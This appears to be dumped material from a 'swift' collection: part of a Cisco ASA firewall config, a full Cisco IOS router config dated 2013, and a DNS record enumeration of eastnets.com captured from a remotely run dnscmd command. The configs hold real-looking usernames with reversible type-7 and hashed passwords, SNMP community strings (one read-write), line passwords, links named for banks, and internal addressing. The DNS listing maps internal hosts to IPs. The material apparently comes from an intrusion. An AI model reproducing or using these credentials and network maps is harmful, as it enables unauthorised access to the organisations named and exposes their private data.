+ network-object host 10.159.9.142
+ network-object host 10.159.9.143
+ network-object host 10.159.9.144
+ network-object host 10.159.9.145
+object-group network sw-users-grp
+ group-object singprod-users-grp
+object-group service DM_INLINE_TCP_2 tcp
+ port-object eq ftp
+ port-object eq ssh
+object-group network swaas-support-grp
+ network-object host 10.100.225.11
+ network-object host 10.100.225.12
+ network-object host 10.100.225.13
+ network-object host 10.100.225.14
+ network-object host 10.100.225.15
+ network-object host 10.100.225.16
+ network-object host 10.100.225.17
+ network-object host 10.100.225.18
+ network-object host 10.100.225.19
+ network-object host 10.100.225.20
+object-group network swaas-users-grp
+ group-object singprod-users-grp
+access-list clients_access_in extended permit tcp host telepin-app-srv1 object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp host telepin-app-srv1 object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit tcp object-group swaas-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group swaas-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit tcp object-group sw-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group sw-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit icmp 192.168.211.0 255.255.255.0 object-group safe-srv-group-ref_clients inactive 
+access-list clients_access_in extended permit object-group rdp object-group swaas-support-grp object-group safe-srv-group-ref_clients 
+access-list clients_access_in extended permit tcp object-group swaas-support-grp object-group safe-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group swaas-support-grp object-group safe-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit icmp object-group swaas-support-grp object-group safe-srv-group-ref_clients 
+access-list clients_access_in extended permit ip 192.168.216.0 255.255.255.0 any 
+access-list clients_access_in extended permit ip ensb-mgmt-nw 255.255.255.0 any 
+access-list clients_access_in extended permit icmp any object-group safe-srv-group-ref_clients 
+access-list swaas_access_in extended permit icmp any any 
+access-list swaas_access_in extended permit tcp object-group safeapp-srv-group host telepin-ftp-srv1 object-group DM_INLINE_TCP_1 
+access-list swaas_access_in extended permit tcp object-group safeapp-srv-group host 202.40.237.145 object-group DM_INLINE_TCP_2 
+access-list swaas_access_in extended permit ip any any 
+access-list mgmt_access_in extended permit ip any any 
+access-list mgmt_access_in remark Implicit rule: Permit all traffic to less secure networks
+access-list mgmt_access_in extended permit icmp any any 
+pager lines 24
+logging enable
+mtu clients 1500
+mtu swaas 1500
+mtu finmex 1500
+mtu mgmt 1500
+no failover
+icmp unreachable rate-limit 1 burst-size 1
+asdm image flash:/asdm-602.bin
+no asdm history enable
+arp timeout 14400
+static (swaas,clients) 192.168.211.240 ensbdswdb-clus netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.241 ensbdswdb1 netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.242 ensbdswdb2 netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.237 ensbdswapp1 netmask 255.255.255.255 dns 
+access-group clients_access_in in interface clients
+access-group swaas_access_in in interface swaas
+access-group mgmt_access_in in interface mgmt
+route clients 0.0.0.0 0.0.0.0 192.168.211.17 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
+timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
+timeout uauth 0:05:00 absolute
+dynamic-access-policy-record DfltAccessPolicy
+aaa authentication enable console LOCAL 
+aaa authentication http console LOCAL 
+aaa authentication ssh console LOCAL 
+aaa authentication telnet console LOCAL 
+aaa authorization command LOCAL 
+aaa authorization exec authentication-server
+http server enable
+http 192.168.208.0 255.255.255.0 mgmt
+http 192.168.211.15 255.255.255.255 clients
+http 192.168.211.17 255.255.255.255 clients
+http ensb-mgmt-nw 255.255.255.0 clients
+snmp-server host mgmt mgmt-srv2 community ^enSBSXstr1ng^
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+no crypto isakmp nat-traversal
+telnet 192.168.208.0 255.255.255.0 mgmt
+telnet timeout 5
+ssh 192.168.208.0 255.255.255.0 mgmt
+ssh timeout 5
+console timeout 0
+threat-detection basic-threat
+threat-detection statistics access-list
+!
+class-map inspection_default
+ match default-inspection-traffic
+!
+!
+policy-map type inspect dns preset_dns_map
+ parameters
+  message-length maximum 512
+policy-map global_policy
+ class inspection_default
+  inspect dns preset_dns_map 
+  inspect ftp 
+  inspect h323 h225 
+  inspect h323 ras 
+  inspect netbios 
+  inspect rsh 
+  inspect rtsp 
+  inspect skinny  
+  inspect esmtp 
+  inspect sqlnet 
+  inspect sunrpc 
+  inspect tftp 
+  inspect sip  
+  inspect xdmcp 
+!
+service-policy global_policy global
+tftp-server mgmt mgmt-srv1 /
+username adesear password AyUoUtKt1Ge6y1xo encrypted privilege 15
+username kbaluyot password veUjjfuhoN5j6Rty encrypted privilege 15
+username msaeed password HrG.2XeAt0pheILG encrypted privilege 15
+username jeromuy password HW2JCVi8GLASfsTQ encrypted privilege 15
+privilege cmd level 3 mode exec command perfmon
+privilege cmd level 3 mode exec command ping
+privilege cmd level 3 mode exec command who
+privilege cmd level 3 mode exec command logging
+privilege cmd level 3 mode exec command failover
+privilege show level 5 mode exec command running-config
+privilege show level 3 mode exec command reload
+privilege show level 3 mode exec command mode
+privilege show level 3 mode exec command firewall
+privilege show level 3 mode exec command interface
+privilege show level 3 mode exec command clock
+privilege show level 3 mode exec command dns-hosts
+privilege show level 3 mode exec command access-list
+privilege show level 3 mode exec command logging
+privilege show level 3 mode exec command ip
+privilege show level 3 mode exec command failover
+privilege show level 3 mode exec command asdm
+privilege show level 3 mode exec command arp
+privilege show level 3 mode exec command route
+privilege show level 3 mode exec command ospf
+privilege show level 3 mode exec command aaa-server
+privilege show level 3 mode exec command aaa
+privilege show level 3 mode exec command eigrp
+privilege show level 3 mode exec command crypto
+privilege show level 3 mode exec command vpn-sessiondb
+privilege show level 3 mode exec command ssh
+privilege show level 3 mode exec command dhcpd
+privilege show level 3 mode exec command vpn
+privilege show level 3 mode exec command blocks
+privilege show level 3 mode exec command wccp
+privilege show level 3 mode exec command uauth
+privilege show level 3 mode configure command interface
+privilege show level 3 mode configure command clock
+privilege show level 3 mode configure command access-list
+privilege show level 3 mode configure command logging
+privilege show level 3 mode configure command ip
+privilege show level 3 mode configure command failover
+privilege show level 5 mode configure command asdm
+privilege show level 3 mode configure command arp
+privilege show level 3 mode configure command route
+privilege show level 3 mode configure command aaa-server
+privilege show level 3 mode configure command aaa
+privilege show level 3 mode configure command crypto
+privilege show level 3 mode configure command ssh
+privilege show level 3 mode configure command dhcpd
+privilege show level 5 mode configure command privilege
+privilege clear level 3 mode exec command dns-hosts
+privilege clear level 3 mode exec command logging
+privilege clear level 3 mode exec command arp
+privilege clear level 3 mode exec command aaa-server
+privilege clear level 3 mode exec command crypto
+privilege cmd level 3 mode configure command failover
+privilege clear level 3 mode configure command logging
+privilege clear level 3 mode configure command arp
+privilege clear level 3 mode configure command crypto
+privilege clear level 3 mode configure command aaa-server
+prompt hostname context 
+Cryptochecksum:360d731107f25722f1ef9d57dc61a1bb
+: end

swift/00729_0_ensbdrtr1-2013sep06

@@ -0,0 +1,811 @@
+
+!
+version 12.4
+service timestamps debug uptime
+service timestamps log datetime localtime
+service password-encryption
+!
+hostname ENSBDRTR1
+!
+boot-start-marker
+boot system flash:c3825-ipbase-mz.124-24.T5.bin
+boot-end-marker
+!
+card type e1 1
+logging buffered 4096 debugging
+enable secret 5 $1$85QF$0zprzPbrh20noxfLqUzNJ1
+enable password 7 045819560C71481F054A
+!
+aaa new-model
+!
+!
+aaa authentication login default local
+aaa authentication ppp default local
+!
+aaa session-id common
+!
+resource policy
+!
+no network-clock-participate slot 1 
+ip cef
+!
+!
+!
+!
+no ip domain lookup
+isdn switch-type basic-net3
+!
+username admin password 7 0307495B055F251D420C
+username ensb password 7 047E0A151B0F495A1A
+username ENSBBRTR1 password 7 094D5D0D1F0404160D
+username Router password 7 106B080A1139171F1F
+username HQ-AS-1 password 7 123C04040625091039
+username ENSBPRTR1 password 7 11584B56
+username ENSBDRTR1 password 7 12485744
+username ensbpk password 7 094F471A1A0A
+username asdf1 password 7 094F471A1A0A
+username abc password 7 104F0B1A
+username OASIS-INTERNET-ROUTER password 7 08044D5D1D37160301
+username HQR4 password 7 09694F1A0D2B120618
+username cbom password 7 045809560271415C1C
+archive
+ log config
+  hidekeys
+!
+!
+controller E1 1/0
+ framing NO-CRC4 
+ pri-group timeslots 1-31
+!
+controller E1 1/1
+!
+!
+!
+interface Loopback0
+ no ip address
+!
+interface Loopback1
+ description For PSTN Dialin Interface
+ ip address 10.92.115.1 255.255.255.128
+!
+interface GigabitEthernet0/0
+ description Connected to MPLS line (207)
+ no ip address
+ duplex auto
+ speed auto
+ media-type rj45
+!
+interface GigabitEthernet0/0.1
+ description MPLS-1-207
+ encapsulation dot1Q 18
+ ip address 192.168.207.139 255.255.255.248
+!
+interface GigabitEthernet0/0.2
+ description MPLS-2-215
+ encapsulation dot1Q 225
+ ip address 192.168.215.139 255.255.255.240
+!
+interface GigabitEthernet0/1
+ description connected to EthernetLAN
+ no ip address
+ duplex auto
+ speed auto
+ media-type rj45
+!
+interface GigabitEthernet0/1.1
+ description Dialin-1 Network 
+ encapsulation dot1Q 207
+ ip address 192.168.207.1 255.255.255.192
+!
+interface GigabitEthernet0/1.2
+ description Dialin-2 Network
+ encapsulation dot1Q 215
+ ip address 192.168.215.1 255.255.255.224
+!
+interface Serial0/0/0
+ description KIAK-Temp
+ ip address 172.16.1.2 255.255.255.252
+!
+interface Serial0/0/1
+ description SHARJAH ISLAMIC BANK
+ ip address 10.10.201.1 255.255.255.252
+ encapsulation ppp
+!
+interface Serial1/0:15
+ description connected to Dial-inPCs PRI)
+ ip address 10.91.116.1 255.255.255.128
+ encapsulation ppp
+ no ip split-horizon
+ dialer idle-timeout 10000
+ dialer-group 102
+ isdn switch-type primary-net5
+ peer default ip address pool ENSBDRTR1-PRI
+ no cdp enable
+ ppp authentication pap
+!
+interface BRI2/0
+ description connected to Dial-inPCs(ISDN)
+ no ip address
+ encapsulation ppp
+ dialer pool-member 1
+ dialer pool-member 2
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/1
+ description connected to Dial-inPCs(ISDN)_1
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 2
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/2
+ description connected to Dial-inPCs(ISDN)_2
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 3
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/3
+ description connected to Dial-inPCs(ISDN)_3
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 4
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/4
+ description connected to Dial-inPCs(ISDN)_4
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 5
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/5
+ description connected to Dial-inPCs(ISDN)_5
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 6
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/6
+ description connected to Dial-inPCs(ISDN)_6
+ no ip address
+ encapsulation ppp
+ dialer rotary-group 7
+ dialer-group 102
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap pap
+!
+interface BRI2/7
+ description connected to Dial-inPCs(ISDN)_7
+ no ip address
+ encapsulation ppp
+ dialer pool-member 1
+ isdn switch-type basic-net3
+ isdn point-to-point-setup
+ no cdp enable
+ ppp authentication chap
+!
+interface Async0/322
+ no ip address
+ encapsulation slip
+!
+interface Async0/323
+ no ip address
+ encapsulation slip
+!
+interface Async0/324
+ no ip address
+ encapsulation slip
+!
+interface Async0/325
+ no ip address
+ encapsulation slip
+!
+interface Async0/326
+ no ip address
+ encapsulation slip
+!
+interface Async0/327
+ no ip address
+ encapsulation slip
+!
+interface Async0/328
+ no ip address
+ encapsulation slip
+!
+interface Async0/329
+ no ip address
+ encapsulation slip
+!
+interface Async0/330
+ no ip address
+ encapsulation slip
+!
+interface Async0/331
+ no ip address
+ encapsulation slip
+!
+interface Async0/332
+ no ip address
+ encapsulation slip
+!
+interface Async0/333
+ no ip address
+ encapsulation slip
+!
+interface Async0/334
+ no ip address
+ encapsulation slip
+!
+interface Async0/335
+ no ip address
+ encapsulation slip
+!
+interface Async0/336
+ no ip address
+ encapsulation slip
+!
+interface Async0/337
+ no ip address
+ encapsulation slip
+!
+interface Async0/338
+ no ip address
+ encapsulation slip
+!
+interface Async0/339
+ no ip address
+ encapsulation slip
+!
+interface Async0/340
+ no ip address
+ encapsulation slip
+!
+interface Async0/341
+ no ip address
+ encapsulation slip
+!
+interface Async0/342
+ no ip address
+ encapsulation slip
+!
+interface Async0/343
+ no ip address
+ encapsulation slip
+!
+interface Async0/344
+ no ip address
+ encapsulation slip
+!
+interface Async0/345
+ no ip address
+ encapsulation slip
+!
+interface Async0/346
+ no ip address
+ encapsulation slip
+!
+interface Async0/347
+ no ip address
+ encapsulation slip
+!
+interface Async0/348
+ no ip address
+ encapsulation slip
+!
+interface Async0/349
+ no ip address
+ encapsulation slip
+!
+interface Async0/350
+ no ip address
+ encapsulation slip
+!
+interface Async0/351
+ no ip address
+ encapsulation slip
+!
+interface Async0/352
+ no ip address
+ encapsulation slip
+!
+interface Async0/353
+ no ip address
+ encapsulation slip
+!
+interface Async0/354
+ no ip address
+ encapsulation slip
+!
+interface Async0/355
+ no ip address
+ encapsulation slip
+!
+interface Async0/356
+ no ip address
+ encapsulation slip
+!
+interface Async0/357
+ no ip address
+ encapsulation slip
+!
+interface Async0/386
+ no ip address
+ encapsulation slip
+!
+interface Async0/387
+ no ip address
+ encapsulation slip
+!
+interface Async0/388
+ no ip address
+ encapsulation slip
+!
+interface Async0/389
+ no ip address
+ encapsulation slip
+!
+interface Async0/390
+ no ip address
+ encapsulation slip
+!
+interface Async0/391
+ no ip address
+ encapsulation slip
+!
+interface Async0/392
+ no ip address
+ encapsulation slip
+!
+interface Async0/393
+ no ip address
+ encapsulation slip
+!
+interface Async0/394
+ no ip address
+ encapsulation slip
+!
+interface Async0/395
+ no ip address
+ encapsulation slip
+!
+interface Async0/396
+ no ip address
+ encapsulation slip
+!
+interface Async0/397
+ no ip address
+ encapsulation slip
+!
+interface Async0/398
+ no ip address
+ encapsulation slip
+!
+interface Async0/399
+ no ip address
+ encapsulation slip
+!
+interface Async0/400
+ no ip address
+ encapsulation slip
+!
+interface Async0/401
+ no ip address
+ encapsulation slip
+!
+interface Async0/402
+ no ip address
+ encapsulation slip
+!
+interface Async0/403
+ no ip address
+ encapsulation slip
+!
+interface Async0/404
+ no ip address
+ encapsulation slip
+!
+interface Async0/405
+ no ip address
+ encapsulation slip
+!
+interface Async0/406
+ no ip address
+ encapsulation slip
+!
+interface Async0/407
+ no ip address
+ encapsulation slip
+!
+interface Async0/408
+ no ip address
+ encapsulation slip
+!
+interface Async0/409
+ no ip address
+ encapsulation slip
+!
+interface Async0/410
+ no ip address
+ encapsulation slip
+!
+interface Async0/411
+ no ip address
+ encapsulation slip
+!
+interface Async0/412
+ no ip address
+ encapsulation slip
+!
+interface Async0/413
+ no ip address
+ encapsulation slip
+!
+interface Async0/414
+ no ip address
+ encapsulation slip
+!
+interface Async0/415
+ no ip address
+ encapsulation slip
+!
+interface Async0/416
+ no ip address
+ encapsulation slip
+!
+interface Async0/417
+ no ip address
+ encapsulation slip
+!
+interface Async0/418
+ no ip address
+ encapsulation slip
+!
+interface Async0/419
+ no ip address
+ encapsulation slip
+!
+interface Async0/420
+ no ip address
+ encapsulation slip
+!
+interface Async0/421
+ no ip address
+ encapsulation slip
+!
+interface Dialer0
+ no ip address
+!
+interface Dialer1
+ description connected to Dial-inPCs(ISDN)
+ ip address 10.91.115.1 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ peer default ip address pool ENSBDRTR1-Group-1
+ no cdp enable
+ ppp max-bad-auth 3
+ ppp authentication pap
+!
+interface Dialer2
+ description connected to Dial-inPCs(ISDN)_1
+ ip address 10.91.115.9 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-2
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer3
+ description connected to Dial-inPCs(ISDN)_2
+ ip address 10.91.115.17 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-3
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer4
+ description connected to Dial-inPCs(ISDN)_3
+ ip address 10.91.115.25 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-4
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer5
+ description connected to Dial-inPCs(ISDN)_4
+ ip address 10.91.115.33 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-5
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer6
+ description connected to Dial-inPCs(ISDN)_5
+ ip address 10.91.115.41 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-6
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer7
+ description connected to Dial-inPCs(ISDN)_6
+ ip address 10.91.115.49 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-7
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer8
+ description connected to Dial-inPCs(ISDN)_7
+ ip address 10.91.115.57 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-8
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer9
+ description connected to BankSaderatIran
+ ip address 10.91.115.65 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name Router
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+!
+interface Dialer10
+ description connected to OAB
+ ip address negotiated
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name HQR4
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+ ppp chap hostname HQR4
+ ppp chap password 7 09694F1A0D2B120618
+ ppp pap sent-username HQR4 password 7 08044D5D1D37000301
+ ppp multilink
+!
+interface Dialer11
+ description connected to PSTN Dialin clients
+ ip unnumbered Loopback1
+ encapsulation ppp
+ ip tcp header-compression
+ dialer in-band
+ dialer-group 101
+ peer default ip address pool PSTNPool1
+ no cdp enable
+ ppp authentication pap chap
+!
+interface Dialer12
+ description connected to Oasis Capital
+ ip address 10.91.115.89 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name OASIS-INTERNET-ROUTER
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+!
+interface Dialer60
+ ip address 5.5.5.1 255.255.255.252
+ encapsulation ppp
+ shutdown
+ dialer pool 1
+ dialer remote-name ENSBPRTR1
+ dialer string 0
+ dialer-group 101
+ no peer default ip address
+ ppp authentication chap
+!
+interface Dialer70
+ ip address 6.6.6.1 255.255.255.252
+ encapsulation ppp
+ dialer pool 1
+ dialer remote-name ENSBURTR1
+ dialer string 0
+ dialer-group 101
+ ppp authentication chap
+!
+interface Dialer101
+ description connected to ISDN ENSBBRTR1
+ ip address 10.92.115.249 255.255.255.248
+ encapsulation ppp
+ dialer pool 1
+ dialer remote-name ENSBBRTR1
+ dialer idle-timeout 120 either
+ dialer fast-idle 30
+ dialer string 90097317584471
+ dialer-group 101
+ no peer default ip address
+ no cdp enable
+ ppp authentication chap
+!
+interface Dialer1001
+ description connected to testdxb
+ ip address 10.91.115.81 255.255.255.248
+ encapsulation ppp
+ dialer pool 1
+ peer default ip address 10.91.115.82
+ ppp authentication chap callin
+ ppp chap hostname asdf1
+!
+interface Group-Async1
+ physical-layer async
+ no ip address
+ encapsulation slip
+!
+ip local pool PSTNPool1 10.92.115.2 10.92.115.100
+ip local pool ENSBDRTR1-Group-1 10.91.115.2 10.91.115.3
+ip local pool ENSBDRTR1-Group-2 10.91.115.10 10.91.115.11
+ip local pool ENSBDRTR1-Group-3 10.91.115.18 10.91.115.19
+ip local pool ENSBDRTR1-Group-4 10.91.115.26 10.91.115.27
+ip local pool ENSBDRTR1-Group-5 10.91.115.34 10.91.115.35
+ip local pool ENSBDRTR1-Group-6 10.91.115.42 10.91.115.43
+ip local pool ENSBDRTR1-Group-7 10.91.115.50 10.91.115.51
+ip local pool ENSBDRTR1-Group-8 10.91.115.58 10.91.115.59
+ip local pool ENSBDRTR1-PRI 10.91.116.10 10.91.116.40
+ip route 0.0.0.0 0.0.0.0 192.168.207.5
+ip route 1.1.1.1 255.255.255.255 Serial0/0/0
+ip route 10.0.0.0 255.255.255.240 10.10.201.2
+ip route 10.10.33.20 255.255.255.252 Serial0/0/0
+ip route 10.10.200.0 255.255.255.248 10.10.201.2
+ip route 10.95.115.0 255.255.255.0 Dialer60
+ip route 192.168.100.0 255.255.255.0 Dialer9
+ip route 192.168.200.0 255.255.255.0 Dialer9
+ip route 192.168.206.10 255.255.255.255 192.168.215.4
+ip route 192.168.206.110 255.255.255.255 192.168.215.4
+ip route 192.168.206.111 255.255.255.255 192.168.215.4
+ip route 192.168.208.0 255.255.255.240 172.16.1.1
+ip route 192.168.217.0 255.255.255.192 Dialer101
+ip route 192.168.247.0 255.255.255.0 Dialer60
+ip route 192.168.248.0 255.255.255.0 Dialer70
+!
+ip http server
+!
+access-list 101 permit ip any any log
+access-list 101 permit icmp any any log
+access-list 101 permit esp any any log
+access-list 101 permit ahp any any log
+access-list 101 permit udp any any
+access-list 102 permit ip any any log
+access-list 102 permit icmp any any log
+access-list 102 permit esp any any log
+access-list 102 permit ahp any any log
+access-list 102 permit udp any any
+access-list 105 permit ip any any log
+dialer-list 1 protocol ip permit
+dialer-list 101 protocol ip list 101
+dialer-list 102 protocol ip list 102
+snmp-server community ENSB RW
+snmp-server enable traps snmp authentication linkdown linkup coldstart warmstart
+snmp-server enable traps vrrp
+snmp-server enable traps ds1
+snmp-server enable traps tty
+snmp-server enable traps eigrp
+snmp-server enable traps flash insertion removal
+snmp-server enable traps ds3
+snmp-server enable traps envmon
+snmp-server enable traps icsudsu
+snmp-server enable traps isdn call-information
+snmp-server enable traps isdn layer2
+snmp-server enable traps isdn chan-not-avail
+snmp-server enable traps isdn ietf
+snmp-server enable traps ds0-busyout
+snmp-server enable traps ds1-loopback
+snmp-server enable traps aaa_server
+snmp-server enable traps atm subif
+snmp-server enable traps memory bufferpeak
+snmp-server enable traps cnpd
+snmp-server enable traps config-copy
+snmp-server enable traps config
+snmp-server enable traps entity
+snmp-server enable traps fru-ctrl
+snmp-server enable traps frame-relay multilink bundle-mismatch
+snmp-server enable traps frame-relay
+snmp-server enable traps frame-relay subif
+snmp-server enable traps hsrp
+snmp-server enable traps ipmulticast
+snmp-server enable traps msdp
+snmp-server enable traps mvpn
+snmp-server enable traps ospf state-change
+snmp-server enable traps ospf errors
+snmp-server enable traps ospf retransmit
+snmp-server enable traps ospf lsa
+snmp-server enable traps ospf cisco-specific state-change nssa-trans-change
+snmp-server enable traps ospf cisco-specific state-change shamlink interface-old
+snmp-server enable traps ospf cisco-specific state-change shamlink neighbor
+snmp-server enable traps ospf cisco-specific errors
+snmp-server enable traps ospf cisco-specific retransmit
+snmp-server enable traps ospf cisco-specific lsa
+snmp-server enable traps pim neighbor-change rp-mapping-change invalid-pim-message
+snmp-server enable traps pppoe
+snmp-server enable traps cpu threshold
+snmp-server enable traps rsvp
+snmp-server enable traps rtr
+snmp-server enable traps syslog
+snmp-server enable traps l2tun session
+snmp-server enable traps vtp
+snmp-server host 192.168.206.110 ENSB 
+!
+control-plane
+!
+!
+line con 0
+ exec-timeout 0 0
+ password 7 02050D480809
+ logging synchronous
+line aux 0
+line 0/322 0/357
+line 0/386 0/421
+line vty 0 4
+ session-timeout 10 
+ exec-timeout 0 0
+ password 7 096C1F0C174B24302509103D2436236215
+ logging synchronous
+line vty 5 9
+ session-timeout 10 
+ password 7 013357015545352D0F495A1E16171C432B
+!
+scheduler allocate 20000 1000
+!
+end

swift/DNS Zone Trans 2013_10_11.txt

@@ -0,0 +1,945 @@
+Command: run -command "C:\Windows\System32\dnscmd.exe 127.0.0.1 /enumrecords eastnets.com @" -redirect
+
+Process started with id 6848
+Returned records:
+@ [Aging:3618315] 600 A	192.168.253.230
+		 [Aging:3618329] 600 A	192.168.240.10
+		 [Aging:3618313] 600 A	169.254.38.180
+		 [Aging:3618313] 600 A	192.168.153.201
+		 [Aging:3618311] 600 A	169.254.71.145
+		 [Aging:3618311] 600 A	192.168.3.10
+		 [Aging:3617378] 600 A	169.254.49.231
+		 [Aging:3618318] 600 A	169.254.106.117
+		 [Aging:3618318] 600 A	10.10.0.5
+		 [Aging:3618316] 600 A	192.168.0.15
+		 [Aging:3618316] 600 A	169.254.200.229
+		 [Aging:3618316] 600 A	169.254.141.101
+		 [Aging:3618329] 600 A	192.168.2.25
+		 [Aging:3618330] 600 A	192.168.0.16
+		 [Aging:3618331] 3600 NS	endxbdc001.eastnets.com.
+		 3600 NS	enammad001.eastnets.com.
+		 3600 NS	enedc.eastnets.com.
+		 3600 NS	endxbmail001.eastnets.com.
+		 3600 NS	enammad002.eastnets.com.
+		 3600 NS	enbevdc1.eastnets.com.
+		 3600 NS	endcbackup.eastnets.com.
+		 3600 NS	vdc04.eastnets.com.
+		 3600 NS	vendc01.eastnets.com.
+		 3600 NS	enusdc01.eastnets.com.
+		 3600 NS	enbedc01.eastnets.com.
+		 3600 SOA	endcbackup.eastnets.com. admin. 553426 300 600 86400 3600
+AABUGHALION-PC [Aging:3618292] 1200 A	10.10.10.38
+ABU_ALSONDOS [Aging:3610980] 1200 A	192.168.0.123
+ADclient 3600 A	192.168.100.132
+Adel-Lap [Aging:3610807] 1200 A	10.10.0.56
+ADJD [Aging:3607688] 1200 A	192.168.100.110
+admin 3600 A	192.168.0.7
+admin-PC [Aging:3618328] 1200 A	192.168.153.112
+adpvm [Aging:3606516] 1200 A	192.168.100.108
+Afnanjaber-vmxp [Aging:3614717] 1200 A	192.168.50.79
+AJALALUDEEN-PC [Aging:3604957] 1200 A	10.10.10.92
+Aladdin 3600 A	192.168.253.27
+AliKalakech-PC [Aging:3616935] 1200 A	10.10.200.13
+Allison [Aging:3607885] 1200 A	192.168.153.194
+Amman 3600 A	192.168.0.50
+Amman1-dag [Aging:3618322] 300 A	192.168.0.51
+ammanaixdev 3600 A	192.168.100.247
+apollo 3600 A	192.168.253.200
+apollo-PC [Aging:3606124] 1200 A	10.10.10.167
+araskin [Aging:3618323] 1200 A	192.168.253.244
+Artemis 3600 A	192.168.253.23
+Artemis-LOM 3600 A	192.168.253.248
+Athena 3600 A	192.168.253.29
+autodiscover 3600 A	192.168.0.50
+autotest [Aging:3618320] 900 A	192.168.50.88
+backup [Aging:3618318] 1200 A	10.10.0.196
+BAMVM [Aging:3602625] 1200 A	192.168.100.171
+Bashar-VAIO [Aging:3596909] 1200 A	10.10.10.141
+BDuheidel-VAIO [Aging:3610230] 1200 A	10.10.10.106
+BDUHEIDELVAIO [Aging:3618225] 1200 A	10.10.10.103
+Bigblue 3600 A	192.168.253.24
+Bilal-SDPtest [Aging:3612852] 1200 A	192.168.0.147
+BILLYEASTNETS [Aging:3617045] 1200 A	10.10.10.91
+BKExchange2010 [Aging:3618322] 1200 A	192.168.0.2
+blog 3600 A	174.123.131.41
+Brussels 3600 A	192.168.240.19
+Brussels-dag [Aging:3618313] 300 A	192.168.240.21
+BTSERVER [Aging:3609528] 1200 A	192.168.100.139
+Burgan [Aging:3617605] 1200 A	192.168.100.134
+censornet 3600 A	10.10.0.10
+cerberus 3600 A	192.168.253.125
+Chadi [Aging:3604346] 1200 A	10.10.10.20
+challenger_test [Aging:3618326] 1200 A	192.168.253.205
+CLUSTER [Aging:3605360] 1200 A	192.168.100.218
+Columbia 3600 A	192.168.253.90
+compliance34 [Aging:3606871] 1200 A	192.168.50.150
+compliancepro [Aging:3607183] 1200 A	192.168.50.52
+Copernic 3600 A	192.168.253.75
+Corona1 3600 A	192.168.253.132
+corona2 3600 A	192.168.253.85
